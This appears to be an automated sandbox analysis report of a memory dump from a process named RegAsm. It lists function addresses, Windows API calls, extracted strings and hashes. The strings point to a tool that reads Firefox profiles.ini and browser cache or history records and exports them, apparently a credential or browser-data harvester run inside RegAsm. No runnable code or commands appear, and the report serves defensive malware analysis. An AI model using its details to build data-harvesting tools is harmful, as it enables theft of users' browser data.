                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                          • {Unknown}, xrefs: 004132A6
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                          • API String ID: 4111938811-1819279800
                          • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                          • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                          • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                          • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                          Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                          • GetDlgItem.USER32(?,000003EE), ref: 00401238
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                          • GetDlgItem.USER32(?,000003EC), ref: 00401273
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                          • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                          • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                          • SetCursor.USER32(00000000), ref: 0040129E
                          • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                          • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                          • SetBkMode.GDI32(?,00000001), ref: 004012F2
                          • SetTextColor.GDI32(?,00C00000), ref: 00401300
                          • GetSysColorBrush.USER32(0000000F), ref: 00401308
                          • GetDlgItem.USER32(?,000003EE), ref: 00401329
                          • EndDialog.USER32(?,?), ref: 0040135E
                          • DeleteObject.GDI32(?), ref: 0040136A
                          • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                          • ShowWindow.USER32(00000000), ref: 00401398
                          • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                          • ShowWindow.USER32(00000000), ref: 004013A7
                          • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                          • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                          • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                          • String ID:
                          • API String ID: 829165378-0
                          • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                          • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                          • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                          • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                          Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00404172
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                          • wcscpy.MSVCRT ref: 004041D6
                          • wcscpy.MSVCRT ref: 004041E7
                          • memset.MSVCRT ref: 00404200
                          • memset.MSVCRT ref: 00404215
                          • _snwprintf.MSVCRT ref: 0040422F
                          • wcscpy.MSVCRT ref: 00404242
                          • memset.MSVCRT ref: 0040426E
                          • memset.MSVCRT ref: 004042CD
                          • memset.MSVCRT ref: 004042E2
                          • _snwprintf.MSVCRT ref: 004042FE
                          • wcscpy.MSVCRT ref: 00404311
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                          • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                          • API String ID: 2454223109-1580313836
                          • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                          • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                          • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                          • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                          Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                          • SetMenu.USER32(?,00000000), ref: 00411453
                          • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                          • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                          • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                          • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                          • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                          • ShowWindow.USER32(?,?), ref: 004115FE
                          • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                          • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                          • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                          • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                          • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                            • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                            • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                          • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                          • API String ID: 4054529287-3175352466
                          • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                          • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                          • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                          • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                          Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: _snwprintf$memset$wcscpy
                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                          • API String ID: 2000436516-3842416460
                          • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                          • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                          • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                          • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                          Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                            • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                            • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                            • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                            • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                          • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                          • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                          • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                          • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                          • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                          • LoadIconW.USER32(00000000,00000076), ref: 00403634
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                          • LoadIconW.USER32(00000000,00000077), ref: 00403648
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                          • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                          • LoadIconW.USER32(00000000,00000078), ref: 00403670
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                          • String ID:
                          • API String ID: 1043902810-0
                          • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                          • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                          • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                          • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                          Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                          • free.MSVCRT ref: 0040E49A
                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                          • memset.MSVCRT ref: 0040E380
                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                            • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                          • wcschr.MSVCRT ref: 0040E3B8
                          • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                          • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E407
                          • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E422
                          • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E43D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                          • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                          • API String ID: 3849927982-2252543386
                          • Opcode ID: f8736963c1e408997af279cfc298981fa7ef611c2197f5f9bddedf84c8b339a3
                          • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                          • Opcode Fuzzy Hash: f8736963c1e408997af279cfc298981fa7ef611c2197f5f9bddedf84c8b339a3
                          • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                          Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                          Download Yara Rule
                          APIs
                          • ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                          • _snwprintf.MSVCRT ref: 0044488A
                          • wcscpy.MSVCRT ref: 004448B4
                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ??2@??3@_snwprintfwcscpy
                          • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                          • API String ID: 2899246560-1542517562
                          • Opcode ID: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                          • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                          • Opcode Fuzzy Hash: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                          • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                          Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 004091E2
                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                          • memcmp.MSVCRT ref: 004092D9
                          • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                          • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                          • memcmp.MSVCRT ref: 0040933B
                          • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                          • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                          • memcmp.MSVCRT ref: 00409411
                          • memcmp.MSVCRT ref: 00409429
                          • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                          • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                          • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                          • memcmp.MSVCRT ref: 004094AC
                          • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                          • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcpy$memcmp$ByteCharMultiWidememset
                          • String ID:
                          • API String ID: 3715365532-3916222277
                          • Opcode ID: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                          • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                          • Opcode Fuzzy Hash: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                          • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                          Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                          • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                          • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                          • memset.MSVCRT ref: 004085CF
                          • memset.MSVCRT ref: 004085F1
                          • memset.MSVCRT ref: 00408606
                          • strcmp.MSVCRT ref: 00408645
                          • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                          • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                          • memset.MSVCRT ref: 0040870E
                          • strcmp.MSVCRT ref: 0040876B
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                          • CloseHandle.KERNEL32(?), ref: 004087A6
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                          • String ID: ---
                          • API String ID: 3437578500-2854292027
                          • Opcode ID: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                          • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                          • Opcode Fuzzy Hash: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                          • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                          Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0041087D
                          • memset.MSVCRT ref: 00410892
                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                          • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                          • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                          • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                          • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                          • GetSysColor.USER32(0000000F), ref: 00410999
                          • DeleteObject.GDI32(?), ref: 004109D0
                          • DeleteObject.GDI32(?), ref: 004109D6
                          • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                          • String ID:
                          • API String ID: 1010922700-0
                          • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                          • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                          • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                          • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                          Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                          • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                          • malloc.MSVCRT ref: 004186B7
                          • free.MSVCRT ref: 004186C7
                          • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                          • free.MSVCRT ref: 004186E0
                          • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                          • malloc.MSVCRT ref: 004186FE
                          • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                          • free.MSVCRT ref: 00418716
                          • free.MSVCRT ref: 0041872A
                          • free.MSVCRT ref: 00418749
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: free$FullNamePath$malloc$Version
                          • String ID: |A
                          • API String ID: 3356672799-1717621600
                          • Opcode ID: 7e01f0dee03851588a79a4a26fa611e8dffd0452dbc09a85c2cc2e741f239264
                          • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                          • Opcode Fuzzy Hash: 7e01f0dee03851588a79a4a26fa611e8dffd0452dbc09a85c2cc2e741f239264
                          • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                          Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: _wcsicmp
                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                          • API String ID: 2081463915-1959339147
                          • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                          • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                          • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                          • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                          Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetDC.USER32(00000000), ref: 004121FF
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                          • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                          • SetBkMode.GDI32(?,00000001), ref: 00412232
                          • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                          • SelectObject.GDI32(?,?), ref: 00412251
                          • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                          • SelectObject.GDI32(00000014,00000005), ref: 00412291
                            • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                            • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                            • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                          • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                          • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                          • SetCursor.USER32(00000000), ref: 004122BC
                          • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                          • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                          • String ID:
                          • API String ID: 1700100422-0
                          • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                          • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                          • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                          • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                          Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                          Download Yara Rule
                          APIs
                          • GetClientRect.USER32(?,?), ref: 004111E0
                          • GetWindowRect.USER32(?,?), ref: 004111F6
                          • GetWindowRect.USER32(?,?), ref: 0041120C
                          • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                          • GetWindowRect.USER32(00000000), ref: 0041124D
                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                          • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                          • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                          • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                          • EndDeferWindowPos.USER32(?), ref: 0041130B
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Window$Defer$Rect$BeginClientItemPoints
                          • String ID:
                          • API String ID: 552707033-0
                          • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                          • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                          • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                          • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                          Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$_snwprintf
                          • String ID: %%0.%df
                          • API String ID: 3473751417-763548558
                          • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                          • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
